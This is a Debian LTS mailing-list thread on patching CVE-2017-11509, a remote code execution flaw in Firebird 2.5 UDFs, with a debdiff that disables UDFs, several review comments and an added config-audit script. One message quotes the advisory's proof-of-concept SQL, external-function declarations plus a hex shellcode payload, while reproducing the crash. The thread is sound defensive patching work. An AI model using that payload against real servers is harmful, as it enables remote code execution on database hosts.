Re: Wheezy update of firebird2.5?
Damyan Ivanov writes:

> I have added you to https://salsa.debian.org/firebird-team/firebird2.5
> so feel free to push your work. Thanks!

Ok, done.

Packages are available for testing at:

https://people.debian.org/~bam/debian/pool/main/f/firebird2.5/

-- 
Brian May
Re: Wheezy update of firebird2.5?
-=| Brian May, 08.05.2018 17:19:56 +1000 |=-
> Damyan Ivanov writes:
> > The only fix upstream has is to disable UDFs in firebird.conf --
> > https://salsa.debian.org/firebird-team/firebird3.0/blob/master/debian/patches/deb/cve-2017-11509.patch
> >
> > (probably needs adaptation for firebird2.5, but you get the idea).
>
> The patch appears to apply fine without dramas. Attached is the debdiff
> from the previous LTS release.
>
> Just compiling it now, but don't expect any problems.
>
> Damyan,
>
> Assuming I have write access to the firebird2.5 repository, do you have
> any objections if I push my changes (including the previous LTS release)
> to the wheezy branch in the git repository?

Sure! I have added you to https://salsa.debian.org/firebird-team/firebird2.5
so feel free to push your work. Thanks!

-- Damyan
Re: Wheezy update of firebird2.5?
Damyan Ivanov writes:

> -=| Antoine Beaupré, 17.04.2018 12:59:26 -0400 |=-
>> I don't quite know where to go from here. I was somewhat hoping that
>> Wheezy would be magically not vulnerable to this issue, but obviously,
>> there's something wrong here that should probably be fixed.
>
> The only fix upstream has is to disable UDFs in firebird.conf --
> https://salsa.debian.org/firebird-team/firebird3.0/blob/master/debian/patches/deb/cve-2017-11509.patch
>
> (probably needs adaptation for firebird2.5, but you get the idea).

The patch appears to apply fine without dramas. Attached is the debdiff
from the previous LTS release.

Just compiling it now, but don't expect any problems.

Damyan,

Assuming I have write access to the firebird2.5 repository, do you have
any objections if I push my changes (including the previous LTS release)
to the wheezy branch in the git repository?

Regards
-- 
Brian May

diff -Nru firebird2.5-2.5.2.26540.ds4/debian/changelog firebird2.5-2.5.2.26540.ds4/debian/changelog --- firebird2.5-2.5.2.26540.ds4/debian/changelog 2017-03-30 06:01:20.0 +1100 +++ firebird2.5-2.5.2.26540.ds4/debian/changelog 2018-05-07 17:39:32.0 +1000 @@ -1,3 +1,13 @@ +firebird2.5 (2.5.2.26540.ds4-1~deb7u4) UNRELEASED; urgency=high + + * Non-maintainer upload by the LTS Team. + * Disable UDFs in firebird.conf due to a remote authenticated code execution +vilnerability +https://www.tenable.com/security/research/tra-2017-36 (CVE-2017-11509) +http://tracker.firebirdsql.org/browse/CORE-5518 + + -- Brian May Mon, 07 May 2018 17:39:32 +1000 + firebird2.5 (2.5.2.26540.ds4-1~deb7u3) wheezy-security; urgency=high * Non-maintainer upload by the LTS Security Team. diff -Nru firebird2.5-2.5.2.26540.ds4/debian/gbp.conf firebird2.5-2.5.2.26540.ds4/debian/gbp.conf --- firebird2.5-2.5.2.26540.ds4/debian/gbp.conf 2013-07-23 08:21:41.0 +1000 +++ firebird2.5-2.5.2.26540.ds4/debian/gbp.conf 2018-05-07 17:39:32.0 +1000 
@@ -1,2 +1,2 @@ [DEFAULT] -debian-branch=master +debian-branch=wheezy diff -Nru firebird2.5-2.5.2.26540.ds4/debian/patches/CVE-2017-11509.patch firebird2.5-2.5.2.26540.ds4/debian/patches/CVE-2017-11509.patch --- firebird2.5-2.5.2.26540.ds4/debian/patches/CVE-2017-11509.patch 1970-01-01 10:00:00.0 +1000 +++ firebird2.5-2.5.2.26540.ds4/debian/patches/CVE-2017-11509.patch 2018-05-07 17:39:32.0 +1000 @@ -0,0 +1,23 @@ +Description: disable UDFs in firebird.conf + UDFs can be used for remote code execution. see + https://www.tenable.com/security/research/tra-2017-36 (CVE-2017-11509) + http://tracker.firebirdsql.org/browse/CORE-5518 +Author: Damyan Ivanov +Forwarded: no, because upstream doesn't consider this to be a problem + +Index: firebird2.5/builds/install/misc/firebird.conf.in +=== +--- firebird2.5.orig/builds/install/misc/firebird.conf.in firebird2.5/builds/install/misc/firebird.conf.in +@@ -137,7 +137,10 @@ + # + # Type: string (special format) + # +-#UdfAccess = Restrict UDF ++# Debian maintainer note: UDFs can be used for remote code execution as the ++# 'firebird' user. See https://www.tenable.com/security/research/tra-2017-36 ++# (CVE-2017-11509) ++UdfAccess = None + + + # diff -Nru firebird2.5-2.5.2.26540.ds4/debian/patches/series firebird2.5-2.5.2.26540.ds4/debian/patches/series --- firebird2.5-2.5.2.26540.ds4/debian/patches/series 2017-03-30 02:09:54.0 +1100 +++ firebird2.5-2.5.2.26540.ds4/debian/patches/series 2018-05-07 17:39:32.0 +1000 @@ -19,3 +19,4 @@ out/crash-create-db-restricted.patch upstream/r60322-remote-crash.patch CVE-2017-6369.patch +CVE-2017-11509.patch
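Review bot: the debian/changelog hunk misspells "vulnerability" as "vilnerability" and still targets UNRELEASED; the ~deb7u3 entry visible in the same hunk uses wheezy-security, so the distribution field needs changing before the package is uploaded. The wording also differs from the previous entry ("LTS Team" versus "LTS Security Team"); either is fine, but keeping it consistent avoids confusion in the tracker.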
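Review bot: the debian/gbp.conf hunk switches debian-branch from master to wheezy, which matches the branch this is being pushed to, but the change is not recorded in the changelog entry; a one-line item such as "* Set debian-branch to wheezy in gbp.conf" would keep the NMU's changes fully documented.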
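Review bot: the new debian/patches/CVE-2017-11509.patch hunk changes the shipped template from the commented-out "#UdfAccess = Restrict UDF" to "UdfAccess = None", which disables every UDF library, not only the fbudf module referenced in this thread; any existing database that already declares external functions against those modules will start failing when the functions are called after the upgrade. The inserted maintainer comment only gives the security reason, so consider also noting this behavioural change (and the previous default, for sites that knowingly accept the risk) in the comment or in a debian/NEWS entry, since the changelog item does not mention it either.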
Re: Wheezy update of firebird2.5?
-=| Antoine Beaupré, 17.04.2018 12:59:26 -0400 |=-
> I don't quite know where to go from here. I was somewhat hoping that
> Wheezy would be magically not vulnerable to this issue, but obviously,
> there's something wrong here that should probably be fixed.

The only fix upstream has is to disable UDFs in firebird.conf --
https://salsa.debian.org/firebird-team/firebird3.0/blob/master/debian/patches/deb/cve-2017-11509.patch

(probably needs adaptation for firebird2.5, but you get the idea).

-- dam
Re: Wheezy update of firebird2.5?
On 2018-04-04 19:54:14, Damyan Ivanov wrote:
> -=| Chris Lamb, 04.04.2018 08:39:52 +0100 |=-
>> Dear maintainer(s),
>>
>> The Debian LTS team would like to fix the security issues which are
>> currently open in the Wheezy version of firebird2.5:
>> https://security-tracker.debian.org/tracker/source-package/firebird2.5
>>
>> Would you like to take care of this yourself?
>
> Sorry, no.
>
> AFAIS, the only open vulnerability is CVE-2017-11509. Moritz from the
> security team advised against updating that for stable, and the issue
> is still open in unstable.
>
> According to the researchers discovering it, upstream refused to fix
> it :( so the only "fix" I am aware of is the change in the default
> config to disable the vulnerable functionality. You can find the patch
> for firebird3.0 at
> https://salsa.debian.org/firebird-team/firebird3.0/commit/5ad1c64f67ce9f091a2b747fa54519ef7d144698
>
> It is perhaps not directly applicable to firebird2.5, but should help
> regardless.

I tried digging into this issue a little further, and couldn't get far.

I always have this hurdle to just set up a test environment with
Firebird, so I figured I would share the procedure here for the future,
so that I wouldn't have to rebuild this from scratch every time.

1. install the database and packages:

   apt-get install firebird2.5-examples firebird2.5-dev firebird2.5-superclassic

2. set an admin password and configure the server:

   dpkg-reconfigure firebird2.5-superclassic

3. deploy a test database:

   gunzip -c /usr/share/doc/firebird2.5-examples/examples/empbuild/employee.fdb.gz > /var/lib/firebird/2.5/data/employee.fdb
   chown firebird.firebird /var/lib/firebird/2.5/data/employee.fdb

4. connect to the database, in an `isql-fb` prompt:

   SQL> connect "localhost:/var/lib/firebird/2.5/data/employee.fdb" user 'SYSDBA' password 'password';

Then you can do stuff like `SHOW TABLES` and so on.
In particular, I have tried to reproduce the issue and I can confirm I
can create two external functions with the same ENTRY_POINT, although
the second snippet in the advisory has two `DECLARE` statements which I
assume is a typo:

    DECLARE EXTERNAL FUNCTION string2blob
        VARCHAR(300) BY DESCRIPTOR, BLOB
        RETURNS PARAMETER 2
        ENTRY_POINT 'string2blob' MODULE_NAME 'fbudf'

    DECLARE EXTERNAL FUNCTION a6
        VARCHAR(300) BY DESCRIPTOR, VARCHAR(400) BY DESCRIPTOR
        RETURNS INTEGER
        ENTRY_POINT 'string2blob' MODULE_NAME 'fbudf'

The actual query to trigger arbitrary code execution seems to fail,
however:

    SQL> select a6((select x'31db648b7b308b7f0c8b7f1c8b47088b77208b3f807e0c3375f289c703783c8b577801c28b7a2001c789dd8b34af01c645813e4372656175f2817e086f63657375e98b7a2401c7668b2c6f8b7a1c01c78b7caffc01c789d9b1ff53e2fd6863616c6389e252525353535353535253ffd7' from rdb$database), (select x'C8FD8503' from rdb$database)) from rdb$database
    Statement failed, SQLSTATE = 08006
    Unable to complete network request to host "localhost".
    -Error writing data to the connection.

Considering it was crafted to start `CALC.EXE` in Windows, that might be
expected. We do see a segfault in the logs however:

    wheezy Tue Apr 17 16:49:56 2018
        The user defined function: A6
        referencing entrypoint: string2blob
        in module: fbudf
        caused the fatal exception: Segmentation Fault.
        The code attempted to access memory without privilege to do so.
        This exception will cause the Firebird server to terminate abnormally.

... which is probably a bad sign.

I don't quite know where to go from here. I was somewhat hoping that
Wheezy would be magically not vulnerable to this issue, but obviously,
there's something wrong here that should probably be fixed.

A.

-- 
Every time I see an adult on a bicycle I no longer despair for the
future of the human race.
                        - H. G. Wells
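The mitigation the thread settles on is a single configuration change, "UdfAccess = None" in firebird.conf, and the test procedure above shows how easy it is to lose track of what a given server actually has set. The following Python script is an added example for this thread; it is not code from the mailing list, from Firebird or from the Debian package. It reads a firebird.conf, determines the effective UdfAccess value (the last active assignment wins, and an absent or commented-out key falls back to the shipped default of "Restrict UDF"), labels the risk, and can rewrite the file the way the Debian patch does. The config fragments are constructed, and all function and constant names are the example's own.

```python
"""Audit and harden the UdfAccess setting in a Firebird 2.5 firebird.conf.

Added example for this thread; it is not code from the mailing list, from
Firebird, or from the Debian package.  Function and constant names are the
example's own, and the config fragments below are constructed.
"""
import re
from typing import Dict, Tuple

# Value Firebird uses when the key is absent or commented out: the shipped
# template carries '#UdfAccess = Restrict UDF', so UDF libraries in the
# server's UDF directory are loadable by default.
DEFAULT_UDF_ACCESS = "Restrict UDF"

# Matches an active 'UdfAccess = <value>' line; case-insensitive on purpose
# so the audit errs on the side of reporting a setting it finds.
_KEY_RE = re.compile(r"^\s*UdfAccess\s*=\s*(.*?)\s*$", re.IGNORECASE)


def effective_udf_access(conf_text: str) -> Tuple[str, bool]:
    """Return (value, explicit).  Comment lines ('#') are skipped and the
    last active assignment wins, which is what makes a stray trailing
    'UdfAccess = Full' dangerous even when 'None' appears earlier."""
    value, explicit = DEFAULT_UDF_ACCESS, False
    for line in conf_text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        match = _KEY_RE.match(stripped)
        if match:
            value, explicit = match.group(1), True
    return value, explicit


def classify(value: str) -> str:
    """Map a UdfAccess value onto a coarse risk label."""
    lowered = value.strip().lower()
    if lowered == "none":
        return "disabled"        # no UDF library can be loaded at all
    if lowered == "full":
        return "unrestricted"    # any library path on the server is allowed
    if lowered.startswith("restrict"):
        return "restricted"      # libraries from the listed directories only
    return "unknown"


def audit(conf_text: str) -> Dict[str, object]:
    """Summarise one firebird.conf: the effective value, whether it was set
    explicitly, its risk label and whether the CVE-2017-11509 mitigation
    (UdfAccess = None) is in place."""
    value, explicit = effective_udf_access(conf_text)
    risk = classify(value)
    return {"value": value, "explicit": explicit, "risk": risk,
            "mitigated": risk == "disabled"}


def harden(conf_text: str) -> str:
    """Return conf_text with every active UdfAccess line replaced by a single
    'UdfAccess = None' (appended if there was none).  Duplicates are dropped
    so the last-wins rule cannot silently re-enable UDFs."""
    out, written = [], False
    for line in conf_text.splitlines():
        stripped = line.strip()
        if stripped and not stripped.startswith("#") and _KEY_RE.match(stripped):
            if not written:
                out.append("UdfAccess = None")
                written = True
            continue
        out.append(line)
    if not written:
        out.append("UdfAccess = None")
    return "\n".join(out) + "\n"


# Constructed fragments: the shipped template (key commented out) and the
# same fragment after the Debian patch discussed in this thread.
SAMPLE_DEFAULT = """\
#
# Type: string (special format)
#
#UdfAccess = Restrict UDF
"""

SAMPLE_PATCHED = """\
#
# Type: string (special format)
#
# Debian maintainer note: UDFs can be used for remote code execution as the
# 'firebird' user. See https://www.tenable.com/security/research/tra-2017-36
# (CVE-2017-11509)
UdfAccess = None
"""

if __name__ == "__main__":
    for name, text in (("shipped default", SAMPLE_DEFAULT),
                       ("patched", SAMPLE_PATCHED)):
        print(name, audit(text))
    print(harden(SAMPLE_DEFAULT))
```

Run against a real file with `audit(open("/etc/firebird/2.5/firebird.conf").read())`; the "explicit" flag distinguishes a server that was deliberately configured from one silently running on the template default, and `harden()` collapses duplicate assignments rather than just appending, because a later "Full" line would otherwise win.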
Re: Wheezy update of firebird2.5?
-=| Chris Lamb, 04.04.2018 08:39:52 +0100 |=-
> Dear maintainer(s),
>
> The Debian LTS team would like to fix the security issues which are
> currently open in the Wheezy version of firebird2.5:
> https://security-tracker.debian.org/tracker/source-package/firebird2.5
>
> Would you like to take care of this yourself?

Sorry, no.

AFAIS, the only open vulnerability is CVE-2017-11509. Moritz from the
security team advised against updating that for stable, and the issue
is still open in unstable.

According to the researchers discovering it, upstream refused to fix
it :( so the only "fix" I am aware of is the change in the default
config to disable the vulnerable functionality. You can find the patch
for firebird3.0 at
https://salsa.debian.org/firebird-team/firebird3.0/commit/5ad1c64f67ce9f091a2b747fa54519ef7d144698

It is perhaps not directly applicable to firebird2.5, but should help
regardless.

Good luck!
Re: Wheezy update of firebird2.5?
-=| Ola Lundqvist, 25.03.2017 22:46:35 +0100 |=-
> Dear maintainer(s),
>
> The Debian LTS team would like to fix the security issues which are
> currently open in the Wheezy version of firebird2.5:
> https://security-tracker.debian.org/tracker/CVE-2017-6369

Please feel free to take this over with the great LTS team.

In case it would be of any help, the changes needed for the jessie
upload are available at
https://anonscm.debian.org/cgit/pkg-firebird/2.5.git/log/?h=jessie

-- dam